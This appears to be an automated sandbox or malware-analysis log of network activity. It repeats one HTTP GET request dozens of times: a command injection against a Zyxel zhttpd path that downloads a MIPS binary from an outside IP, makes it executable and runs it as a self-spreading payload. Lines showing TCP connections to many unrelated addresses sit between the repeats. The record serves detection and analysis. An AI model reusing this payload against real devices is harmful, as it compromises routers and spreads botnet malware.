            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: unknownTCP traffic detected without corresponding DNS query: 157.220.229.48
            Source: unknownTCP traffic detected without corresponding DNS query: 157.50.201.46
            Source: unknownTCP traffic detected without corresponding DNS query: 155.121.180.100
            Source: unknownTCP traffic detected without corresponding DNS query: 197.18.19.54
            Source: unknownTCP traffic detected without corresponding DNS query: 41.198.118.5
            Source: unknownTCP traffic detected without corresponding DNS query: 157.215.254.37
            Source: unknownTCP traffic detected without corresponding DNS query: 191.103.36.68
            Source: unknownTCP traffic detected without corresponding DNS query: 197.122.60.215
            Source: unknownTCP traffic detected without corresponding DNS query: 157.79.62.249
            Source: unknownTCP traffic detected without corresponding DNS query: 197.159.247.152
            Source: unknownTCP traffic detected without corresponding DNS query: 135.190.2.32
            Source: unknownTCP traffic detected without corresponding DNS query: 197.114.188.153
            Source: unknownTCP traffic detected without corresponding DNS query: 41.159.221.39
            Source: unknownTCP traffic detected without corresponding DNS query: 157.36.95.87
            Source: unknownTCP traffic detected without corresponding DNS query: 157.61.127.79
            Source: unknownTCP traffic detected without corresponding DNS query: 197.59.65.7
            Source: unknownTCP traffic detected without corresponding DNS query: 157.152.231.179
            Source: unknownTCP traffic detected without corresponding DNS query: 197.212.96.180
            Source: unknownTCP traffic detected without corresponding DNS query: 197.215.28.103
            Source: unknownTCP traffic detected without corresponding DNS query: 204.134.166.190
            Source: unknownTCP traffic detected without corresponding DNS query: 79.9.215.107
            Source: unknownTCP traffic detected without corresponding DNS query: 173.47.153.24
            Source: unknownTCP traffic detected without corresponding DNS query: 66.132.254.22
            Source: unknownTCP traffic detected without corresponding DNS query: 41.109.65.129
            Source: unknownTCP traffic detected without corresponding DNS query: 197.41.242.109
            Source: unknownTCP traffic detected without corresponding DNS query: 41.19.33.157
            Source: unknownTCP traffic detected without corresponding DNS query: 157.241.116.194
            Source: unknownTCP traffic detected without corresponding DNS query: 157.5.24.122
            Source: unknownTCP traffic detected without corresponding DNS query: 197.222.239.96
            Source: unknownTCP traffic detected without corresponding DNS query: 157.244.194.166
            Source: unknownTCP traffic detected without corresponding DNS query: 41.119.252.161
            Source: unknownTCP traffic detected without corresponding DNS query: 119.29.90.130
            Source: unknownTCP traffic detected without corresponding DNS query: 86.112.6.204
            Source: unknownTCP traffic detected without corresponding DNS query: 131.170.48.83
            Source: unknownTCP traffic detected without corresponding DNS query: 197.127.52.194
            Source: unknownTCP traffic detected without corresponding DNS query: 158.228.104.8
            Source: unknownTCP traffic detected without corresponding DNS query: 157.119.133.70
            Source: unknownTCP traffic detected without corresponding DNS query: 41.204.231.23
            Source: unknownTCP traffic detected without corresponding DNS query: 197.188.71.220
            Source: unknownTCP traffic detected without corresponding DNS query: 41.235.81.11
            Source: unknownTCP traffic detected without corresponding DNS query: 182.152.121.174
            Source: unknownTCP traffic detected without corresponding DNS query: 41.58.75.15
            Source: unknownTCP traffic detected without corresponding DNS query: 157.202.159.157
            Source: unknownTCP traffic detected without corresponding DNS query: 41.227.94.72
            Source: unknownTCP traffic detected without corresponding DNS query: 197.12.223.13
            Source: unknownTCP traffic detected without corresponding DNS query: 41.61.163.83
            Source: unknownTCP traffic detected without corresponding DNS query: 157.224.83.193
            Source: unknownTCP traffic detected without corresponding DNS query: 197.142.214.113
            Source: unknownTCP traffic detected without corresponding DNS query: 41.146.60.51
            Source: unknownTCP traffic detected without corresponding DNS query: 41.151.120.29
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
